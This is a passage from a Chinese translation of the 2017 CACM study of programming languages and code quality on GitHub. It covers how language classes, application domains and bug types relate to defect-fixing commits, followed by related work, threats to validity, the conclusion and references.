0.191,是低相关度的,表明任何编程语言和领域之间的相关度是非常小的,并且,在回归模型中包含领域并不会产生有意义的结果。 + +去解决这种情况的一个选择是,去移除编程语言,或者混合领域,但是,我们现有的数据没有进行完全挑选。或者,我们混合编程语言;这个选择导致一个相关但略有不同的问题。 + +**RQ2. 哪些编程语言特性与缺陷相关?** + +我们聚合它们为编程语言类别,而不是考虑单独的编程语言,正如在第 2.2 节所描述的那样,然后去分析与缺陷的关系。总体上说,这些属性中的每一个都将编程语言按照在上下文中经常讨论的错误、用户辩论驱动、或者按以前工作主题来划分的。因此,单独的属性是高度相关的,我们创建了六个模型因子,将所有的单独因子综合到我们的研究中。然后,我们对六个不同的因子对缺陷数量的影响进行建模,同时控制我们在 _RQ1_ 节中使用的模型中的相同的基本协变量(译者注:协变量是指在实验中不能被人为操纵的独立变量)。 + +关于使用的编程语言(在前面的 [表 6][67]中),我们使用跨所有语言类的平均反应来比较编程语言 _类_ 。这个模型在 [表 7][68] 中表达了出来。很明显,`Script-Dynamic-Explicit-Managed` 类有最小的量级系数。这个系数是微不足道的,换句话说,对这个系数的 Z 校验(z-test,译者注:统计学上的一种平均值差异校验的方法) 并不能把它从 0 中区分出来。鉴于标准错误的量级,我们可以假设,在这个类别中的编程语言的行为是非常接近于所有编程语言行为的平均值。我们可以通过使用 `Proc-Static-Implicit-Unmanaged` 作为基本级并用于处理,或者使用基本级来虚假编码比较每个语言类,来证明这一点。在这种情况下,`Script-Dynamic-Explicit-Managed` 是明显不同于 _p_  = 0.00044 的。注意,虽然我们在这是选择了不同的编码方法,影响了系数和 Z 值,这个方法和所有其它的方面都是一样的。当我们改变了编码,我们调整系数去反应我们希望生成的对比。[4][28] 将其它类的编程语言与总体平均数进行比较,`Proc-Static-Implicit-Unmanaged` 类编程语言更容易引起缺陷。这意味着与其它过程类编程语言相比,隐式类型转换或者内存托管会导致更多的缺陷倾向。 + + [![t7.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg)][69] +**表 7. 函数式语言与缺陷的关联度和其它类语言相比要低,而过程类语言则大于或接近于平均值。** + +在脚本类编程语言中,我们观察到类似于允许与不允许隐式类型转换的编程语言之间的关系,它们提供的一些证据表明,隐式类型转换(与显示类型转换相比)才是导致这种差异的原因,而不是内存托管。鉴于各种因素之间的相关性,我们并不能得出这个结论。但是,当它们与平均值进行比较时,作为一个组,那些不允许隐式类型转换的编程语言出现错误的倾向更低一些,而那些出现错误倾向更高的编程语言,出现错误的机率则相对更高。在函数式编程语言中静态和动态类型之间的差异也很明显。 + +函数式语言作为一个组展示了与平均值的很明显的差异。静态类型语言的系数要小很多,但是函数式语言类都有同样的标准错误。函数式静态编程语言出现错误的倾向要小于函数式动态编程语言,这是一个强有力的证据,尽管如此,Z 校验仅仅是检验系数是否能从 0 中区分出来。为了强化这个推论,我们使用处理编码,重新编码了上面的模型,并且观察到,`Functional-Static-Explicit-Managed` 编程语言类的错误倾向是明显小于 `Functional-Dynamic-Explicit-Managed` 编程语言类的 _p_  = 0.034。 + + [![ut2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut2.jpg)][70] + +与编程语言和缺陷一样,编程语言类与缺陷之间关系的影响是非常小的。解释类编程语言的这种差异也是相似的,虽然很小,解释类编程语言的这种差异小于 1%。 + +我们现在重新回到应用领域这个问题。应用领域是否与语言类相互影响?怎么选择?例如,一个函数化编程语言,对特定的领域有一定的优势?与上面一样,对于这些因素和项目领域之间的关系做一个卡方检验,它的值是 99.05, _df_  = 30, _p_  = 2.622e–09,我们拒绝无意义假设,Cramer 的 V 产生的值是 0.133,表示一个弱关联。因此,虽然领域和编程语言之间有一些关联,但在这里应用领域和编程语言类之间仅仅是一个非常弱的关联。 + +**结论 2:**  _在编程语言类与缺陷之间有一个很小但是很明显的关系。函数式语言与过程式或者脚本式语言相比,缺陷要少。_ + +这个结论有些不太令人满意的地方,因为,我们并没有一个强有力的证据去证明,在一个项目中编程语言、或者语言类和应用领域之间的关联性。一个替代方法是,基于全部的编程语言和应用领域,忽略项目和缺陷总数,而去查看相同的数据。因为,这样不再产生不相关的样本,我们没有从统计学的角度去尝试分析它,而是使用一个描述式的、基于可视化的方法。 + +我们定义了 _缺陷倾向_ 作为 bug 修复提交与每语言每领域总提交的比率。[图 1][71] 使用了一个热力图展示了应用领域与编程语言之间的相互作用,从亮到暗表示缺陷倾向在增加。我们研究了哪些编程语言因素影响了跨多种语言写的项目的缺陷修复提交。它引出了下面的研究问题: + + [![f1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg)][72] +**图 1. 编程语言的缺陷倾向与应用领域之间的相互作用。对于一个给定的领域(列底部),热力图中的每个格子表示了一个编程语言的缺陷倾向(行头部)。“整体”列表示一个编程语言基于所有领域的缺陷倾向。用白色十字线标记的格子代表一个 null 值,换句话说,就是在那个格子里没有符合的提交。** + +**RQ3. 编程语言的错误倾向是否取决于应用领域?** + +为了回答这个问题,我们首先在我们的回归模型中,以高杠杆点过滤掉认为是异常的项目,这种方法在这里是必要的,尽管这是一个非统计学的方法,一些关系可能影响可视化。例如,我们找到一个简单的项目,Google 的 v8,一个 `JavaScript` 项目,负责中间件中的所有错误。这对我们来说是一个惊喜,因为 `JavaScript` 通常不用于中间件。这个模式一直在其它应用领域中不停地重复着,因此,我们过滤出的项目的缺陷度都低于 10% 和高于 90%。这个结果在 [图 1][73] 中。 + +我们看到在这个热力图中仅有一个很小的差异,正如在 RQ1 节中看到的那样,这个结果仅表示编程语言固有的错误倾向。为验证这个推论,我们测量了编程语言对每个应用领域和对全部应用领域的缺陷倾向。对于除了数据库以外的全部领域,关联性都是正向的,并且 p 值是有意义的(<0.01)。因此,关于缺陷倾向,在每个领域的语言排序与全部领域的语言排序是基本相同的。 + + [![ut3.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut3.jpg)][74] + +**结论 3:**  _应用领域和编程语言缺陷倾向之间总体上没有联系_ + +我们证明了不同的语言产生了大量的缺陷,并且,这个关系不仅与特定的语言相关,也适用于一般的语言类;然而,我们发现,项目类型并不能在一定程度上协调这种关系。现在,我们转变我们的注意力到反应分类上,我想去了解,编程语言与特定种类的缺陷之间有什么联系,以及这种关系怎么与我们观察到的更普通的关系去比较。我们将缺陷分为不同的类别,如 [表 5][75] 所描述的那样,然后提出以下的问题: + +**RQ4. 编程语言与 bug 分类之间有什么关系?** + +我们使用了一个类似于 RQ3 中所用的方法,去了解编程语言与 bug 分类之间的关系。首先,我们研究了 bug 分类和编程语言类之间的关系。一个热力图([图 2][76])展示了在编程语言类和 bug 类型之上的总缺陷数。去理解 bug 分类和语言之间的相互作用,我们对每个类别使用一个 NBR 回归模型。对于每个模型,我们使用了与 RQ1 中相同的控制因素,以及使用加权效应编码后的语言,去预测缺陷修复提交。 + + [![f2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg)][77] +**图 2. bug 类别与编程语言类之间的关系。每个格子表示每语言类(行头部)每 bug 类别(列底部)的 bug 修复提交占全部 bug 修复提交的百分比。这个值是按列规范化的。** + +结果和编程语言的方差分析值展示在 [表 8][78] 中。每个模型的整体异常是非常小的,并且对于特定的缺陷类型,通过语言所展示的比例在大多数类别中的量级是类似的。我们解释这种关系为,编程语言对于特定的 bug 类别的影响要大于总体的影响。尽管我们结论概括了全部的类别,但是,在接下来的一节中,我们对 [表 5][79] 中反应出来的 bug 数较多的 bug 类别做进一步研究。 + + [![t8.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg)][80] +**表 8. 虽然编程语言对缺陷的影响因缺陷类别而不同,但是,编程语言对特定的类别的影响要大于一般的类别。** + +**编程错误** 普通的编程错误占所有 bug 修复提交的 88.53% 左右,并且在所有的编程语言类中都有。因此,回归分析给出了一个与 RQ1 中类似的结论(查看 [表 6][81])。所有的编程语言都会导致这种编程错误,比如,处理错误、定义错误、输入错误、等等。 + +**内存错误** 内存错误占所有 bug 修复提交的 5.44%。热力图 [图 2][82] 证明了在 `Proc-Static-Implicit-Unmanaged` 类和内存错误之间存在着非常紧密的联系。非托管内存的编程语言出现内存 bug,这是预料之中的。[表 8][83] 也证明了这一点,例如,C、C++、和 `Objective-C` 引发了很多的内存错误。在托管内存的语言中 `Java` 引发了更多的内存错误,尽管它少于非托管的编程语言。虽然 `Java` 自己做内存回收,但是,它出现内存泄露一点也不奇怪,因为对象引用经常阻止内存回收。[11][29] 在我们的数据中,`Java` 的所有内存错误中,28.89% 是内存泄漏造成的。就数量而言,编程语言中内存缺陷相比其它类别的 _原因_ 造成的影响要大很多。 + +**并发错误** 在总的 bug 修复提交中,并发错误相关的修复提交占 1.99%。热力图显示,`Proc-Static-Implicit-Unmanaged` 是主要的错误类型。在这种错误中,C 和 C++ 分别占 19.15% 和 7.89%,并且它们分布在各个项目中。 + + [![ut4.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut4.jpg)][84] + +属于 `Static-Strong-Managed` 语言类的编程语言都被证实处于热力图中的暗区中,普通的静态语言相比其它语言产生更多的并发错误。在动态语言中,仅仅有 `Erlang` 更多的并发错误倾向,或许与使用这种语言开发的并发应用程序非常多有关系。同样地,在 [表 8][85] 中的负的系数表明,用诸如 `Ruby` 和 `Php` 这样的动态编程语言写的项目,并发错误要少一些。请注意,某些语言,如 `JavaScript、CoffeeScript`、和 `TypeScript` 是不支持并发的,在传统的惯例中,虽然 `Php` 具有有限的并发支持(取决于它的实现)。这些语言在我们的数据中引入了虚假的 0(zeros),因此,在 [表 8][86] 中这些语言的并发模型的系数,不能像其它的语言那样去解释。因为存在这些虚假的 0,所以在这个模型中所有语言的平均数非常小,它可能影响系数的大小,因此,她们给 w.r.t. 一个平均数,但是,这并不影响他们之间的相对关系,因为我们只关注它们的相对关系。 + +一个基于 bug 修复消息中高频词的文本分析表明,大多数的并发错误发生在一个条件争用、死锁、或者不正确的同步,正如上面表中所示。遍历所有语言,条件争用是并发错误出现最多的原因,例如,在 `Go` 中占 92%。在 `Go` 中条件争用错误的改进,或许是因为使用了一个争用检测工具帮助开发者去定位争用。同步错误主要与消息传递接口(MPI)或者共享内存操作(SHM)相关。`Erlang` 和 `Go` 对线程间通讯使用 MPI[e][30],这就是为什么这两种语言没有发生任何 SHM 相关的错误的原因,比如共享锁、互斥锁、等等。相比之下,为线程间通讯使用早期的 SHM 技术的语言写的项目,就可能存在锁相关的错误。 + +**安全和其它冲突(impact)错误** 在所有的 bug 修复提交中,与冲突错误相关的提交占了 7.33% 左右。其中,`Erlang、C++、Python` 与安全相关的错误要高于平均值([表 8][87])。`Clojure` 项目相关的安全错误较少([图 2][88])。从热力图上我们也可以看出来,`静态` 语言一般更易于发生失败和性能错误,紧随其后的是 `Functional-Dynamic-Explicit-Managed` 语言,比如 `Erlang`。对异常结果的分析表明,编程语言与冲突失败密切相关。虽然安全错误在这个类别中是弱相关的,与残差相比,解释类语言的差异仍然比较大。 + +**结论 4:**  _缺陷类型与编程语言强相关;一些缺陷类型比如内存错误和并发错误也取决于早期的语言(所使用的技术)。对于特定类别,编程语言所引起的错误比整体更多。_ + +[Back to Top][89] + +### 4. 相关工作 + +在编程语言比较之前做的工作分为以下三类: + +**(1)  _受控实验_**  对于一个给定的任务,开发者使用不同的语言进行编程时受到监视。研究然后比较结果,比如,开发成果和代码质量。Hanenberg[7][31]通过开发一个解析程序,对 27 h 监视了 48 位程序员,去比较了静态与动态类型。他发现这两者在代码质量方面没有显著的差异,但是,基于动态类型的语言花费了更短的开发时间。他们的研究是在一个实验室中,使用本科学生,设置了定制的语言和 IDE 来进行的。我们的研究正好相反,是一个实际的流行软件应用的研究。虽然我们只能够通过使用回归模型间接(和 _事后_ )控制混杂因素,我们的优势是样本数量大,并且更真实、使用更广泛的软件。我们发现在相同的条件下,静态化类型的语言比动态化类型的语言更少出现错误倾向,并且不允许隐式类型转换的语言要好于允许隐式类型转换的语言,其对结果的影响是非常小的。这是合理的,因为样本量非常大,所以这种非常小的影响在这个研究中可以看得到。 + +Harrison et al.[8][32] 比较了 C++ 与 `SML`,一个是过程化编程语言,一个是函数化编程语言,在总的错误数量上没有找到显著的差异,不过 `SML` 相比 C++ 有更高的缺陷密集度。`SML` 在我们的数据中并没有体现出来,不过,认为函数式编程语言相比过程化编程语言更少出现缺陷。另一个重点工作是比较跨不同语言的开发工作。[12][33],[20][34] 不过,他们并不分析编程语言的缺陷倾向。 + +**(2)  _调查_**  Meyerovich 和 Rabkin[16][35] 调查了开发者对编程语言的观点,去研究为什么一些编程语言比其它的语言更流行。他们的报告指出,非编程语言的因素影响非常大:先前的编程语言技能、可用的开源工具、以及现有的老式系统。我们的研究也证明,可利用的外部工具也影响软件质量;例如,在 `Go` 中的并发 bug(请查看 RQ4 节内容)。 + +**(3)  _对软件仓库的挖掘_**  Bhattacharya 和 Neamtiu[1][36] 研究了用 C 和 C++ 开发的四个项目,并且发现在 C++ 中开发的组件一般比在 C 中开发的组件更可靠。我们发现 C 和 C++ 的错误倾向要高于全部编程语言的平均值。但是,对于某些 bug 类型,像并发错误,C 的缺陷倾向要高于 C++(请查看第 3 节中的 RQ4)。 + +[Back to Top][90] + +### 5. 有效的风险 + +我们认为,我们的报告的结论几乎没有风险。首先,在识别 bug 修复提交方面,我们依赖的关键字是开发者经常用于表示 bug 修复的关键字。我们的选择是经过认真考虑的。在一个持续的开发过程中,我们去捕获那些开发者一直面对的问题,而不是他们报告的 bug。不过,这种选择存在过高估计的风险。我们对领域分类是为了去解释缺陷的倾向,而且,我们研究组中另外的成员验证过分类。此外,我们花费精力去对 bug 修复提交进行分类,也可能有被最初选择的关键字所污染的风险。每个项目在提交日志的描述上也不相同。为了缓解这些风险,我们像 2.4 节中描述的那样,利用手工注释评估了我们的类别。 + +我们判断文件所属的编程语言是基于文件的扩展名。如果使用不同的编程语言写的文件使用了我们研究的通用的编程语言文件的扩展名,这种情况下也容易出现错误倾向。为减少这种错误,我们使用一个随机样本文件集手工验证了我们的语言分类。 + +根据我们的数据集所显示的情形,2.2 节中的解释类编程语言,我们依据编程语言属性的主要用途作了一些假设。例如,我们将 `Objective-C` 分到非托管内存类型中,而不是混合类型。同样,我们将 `Scala` 注释为函数式编程语言,将 C# 作为过程化的编程语言,虽然,它们在设计的选择上两者都支持[19][37],[21][38]。在这项研究工作中,我们没有从过程化编程语言中分离出面向对象的编程语言(OOP),因为,它们没有清晰的区别,主要差异在于编程类型。我们将 C++ 分到允许隐式类型转换的类别中是因为,某些类型的内存区域可以通过使用指针操作被进行不同的处理 [22][39],并且我们注意到大多数 C++ 编译器可以在编译时检测类型错误。 + +最后,我们将缺陷修复提交关联到编程语言属性上,它们可以反应出报告的风格或者其它开发者的属性。可用的外部工具或者库(library)也可以影响一个相关的编程语言的 bug 数量。 + +[Back to Top][91] + +### 6. 总结 + +我们对编程语言和使用进行了大规模的研究,因为它涉及到软件质量。我们使用的 Github 上的数据,具有很高的复杂性和多个维度上的差异的特性。我们的样本数量允许我们对编程语言效果以及在控制一些混杂因素的情况下,对编程语言、应用领域和缺陷类型之间的相互作用,进行一个混合方法的研究。研究数据显示,函数式语言是好于过程化语言的;不允许隐式类型转换的语言是好于允许隐式类型转换的语言的;静态类型的语言是好于动态类型的语言的;内存托管的语言是好于非托管的语言的。进一步讲,编程语言的缺陷倾向与软件应用领域并没有关联。另外,每个编程语言更多是与特定的 bug 类别有关联,而不是与全部 bug。 + +另一方面,即便是很大规模的数据集,它们被多种方法同时进行分割后,也变得很小且不全面。因此,随着依赖的变量越来越多,很难去回答某个变量所产生的影响有多大这种问题,尤其是在变量之间相互作用的情况下。因此,我们无法去量化编程语言在使用中的特定的效果。其它的方法,比如调查,可能对此有帮助。我们将在以后的工作中来解决这些挑战。 + +[Back to Top][92] + +### 致谢 + +这个材料是在美国国家科学基金会(NSF)以及美国空军科学研究办公室(AFOSR)的授权和支持下完成的。授权号 1445079, 1247280, 1414172,1446683,FA955-11-1-0246。 + +[Back to Top][93] + +### 参考资料 + +1\. Bhattacharya, P., Neamtiu, I. Assessing programming language impact on development and maintenance: A study on C and C++. In  _Proceedings of the 33rd International Conference on Software Engineering, ICSE'11_  (New York, NY USA, 2011). ACM, 171–180. + +2\. Bird, C., Nagappan, N., Murphy, B., Gall, H., Devanbu, P. Don't touch my code! Examining the effects of ownership on software quality. In  _Proceedings of the 19th ACM SIGSOFT Symposium and the 13th European Conference on Foundations of Software Engineering_  (2011). ACM, 4–14. + +3\. Blei, D.M. Probabilistic topic models.  _Commun. ACM 55_ , 4 (2012), 77–84. + +4\. Cohen, J.  _Applied Multiple Regression/Correlation Analysis for the Behavioral Sciences._ Lawrence Erlbaum, 2003. + +5\. Easterbrook, S., Singer, J., Storey, M.-A., Damian, D. Selecting empirical methods for software engineering research. In  _Guide to Advanced Empirical Software Engineering_  (2008). Springer, 285–311. + +6\. El Emam, K., Benlarbi, S., Goel, N., Rai, S.N. The confounding effect of class size on the validity of object-oriented metrics.  _IEEE Trans. Softw. Eng. 27_ , 7 (2001), 630–650. + +7\. Hanenberg, S. An experiment about static and dynamic type systems: Doubts about the positive impact of static type systems on development time. In  _Proceedings of the ACM International Conference on Object Oriented Programming Systems Languages and Applications, OOPSLA'10_  (New York, NY, USA, 2010). ACM, 22–35. + +8\. Harrison, R., Smaraweera, L., Dobie, M., Lewis, P. Comparing programming paradigms: An evaluation of functional and object-oriented programs.  _Softw. Eng. J. 11_ , 4 (1996), 247–254. + +9\. Harter, D.E., Krishnan, M.S., Slaughter, S.A. Effects of process maturity on quality, cycle time, and effort in software product development.  _Manage. Sci. 46_  4 (2000), 451–466. + +10\. Hindley, R. The principal type-scheme of an object in combinatory logic.  _Trans. Am. Math. Soc._  (1969), 29–60. + +11\. Jump, M., McKinley, K.S. Cork: Dynamic memory leak detection for garbage-collected languages. In  _ACM SIGPLAN Notices_ , Volume 42 (2007). ACM, 31–38. + +12\. Kleinschmager, S., Hanenberg, S., Robbes, R., Tanter, É., Stefik, A. Do static type systems improve the maintainability of software systems? An empirical study. In  _2012 IEEE 20th International Conference on Program Comprehension (ICPC)_  (2012). IEEE, 153–162. + +13\. Li, Z., Tan, L., Wang, X., Lu, S., Zhou, Y., Zhai, C. Have things changed now? An empirical study of bug characteristics in modern open source software. In  _ASID'06: Proceedings of the 1st Workshop on Architectural and System Support for Improving Software Dependability_  (October 2006). + +14\. Marques De Sá, J.P.  _Applied Statistics Using SPSS, Statistica and Matlab_ , 2003. + +15\. Mayer, C., Hanenberg, S., Robbes, R., Tanter, É., Stefik, A. An empirical study of the influence of static type systems on the usability of undocumented software. In  _ACM SIGPLAN Notices_ , Volume 47 (2012). ACM, 683–702. + +16\. Meyerovich, L.A., Rabkin, A.S. Empirical analysis of programming language adoption. In  _Proceedings of the 2013 ACM SIGPLAN International Conference on Object Oriented Programming Systems Languages & Applications_  (2013). ACM, 1–18. + +17\. Milner, R. A theory of type polymorphism in programming.  _J. Comput. Syst. Sci. 17_ , 3 (1978), 348–375. + +18\. Mockus, A., Votta, L.G. Identifying reasons for software changes using historic databases. In  _ICSM'00\. Proceedings of the International Conference on Software Maintenance_  (2000). IEEE Computer Society, 120. + +19\. Odersky, M., Spoon, L., Venners, B.  _Programming in Scala._  Artima Inc, 2008. + +20\. Pankratius, V., Schmidt, F., Garretón, G. Combining functional and imperative programming for multicore software: An empirical study evaluating scala and java. In  _Proceedings of the 2012 International Conference on Software Engineering_  (2012). IEEE Press, 123–133. + +21\. Petricek, T., Skeet, J.  _Real World Functional Programming: With Examples in F# and C#._ Manning Publications Co., 2009. + +22\. Pierce, B.C.  _Types and Programming Languages._  MIT Press, 2002. + +23\. Posnett, D., Bird, C., Dévanbu, P. An empirical study on the influence of pattern roles on change-proneness.  _Emp. Softw. Eng. 16_ , 3 (2011), 396–423. + +24\. Tan, L., Liu, C., Li, Z., Wang, X., Zhou, Y., Zhai, C. Bug characteristics in open source software.  _Emp. Softw. Eng._  (2013). + +-------------------------------------------------------------------------------- + +via: https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007 + +作者:[ Baishakhi Ray][a], [Daryl Posnett][b], [Premkumar Devanbu][c], [Vladimir Filkov ][d] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://delivery.acm.org/10.1145/3130000/3126905/mailto:rayb@virginia.edu +[b]:http://delivery.acm.org/10.1145/3130000/3126905/mailto:dpposnett@ucdavis.edu +[c]:http://delivery.acm.org/10.1145/3130000/3126905/mailto:devanbu@cs.ucdavis.edu +[d]:http://delivery.acm.org/10.1145/3130000/3126905/mailto:filkov@cs.ucdavis.edu +[1]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R6 +[2]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R2 +[3]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R9 +[4]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R7 +[5]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R12 +[6]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R15 +[7]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R5 +[8]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R18 +[9]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R7 +[10]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R8 +[11]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R12 +[12]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FNA +[13]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FNB +[14]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FNC +[15]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R10 +[16]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R17 +[17]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R3 +[18]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R13 +[19]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R24 +[20]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 +[21]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 +[22]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 +[23]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 +[24]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R23 +[25]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R14 +[26]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R14 +[27]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FND +[28]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 +[29]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R11 +[30]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FNE +[31]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R7 +[32]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R8 +[33]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R12 +[34]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R20 +[35]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R16 +[36]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R1 +[37]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R19 +[38]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R21 +[39]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R22 +[40]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#comments +[41]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007# +[42]:https://cacm.acm.org/about-communications/mobile-apps/ +[43]:http://dl.acm.org/citation.cfm?id=3144574.3126905&coll=portal&dl=ACM +[44]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/pdf +[45]:http://dl.acm.org/ft_gateway.cfm?id=3126905&ftid=1909469&dwn=1 +[46]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop +[47]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop +[48]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg +[49]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg +[50]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg 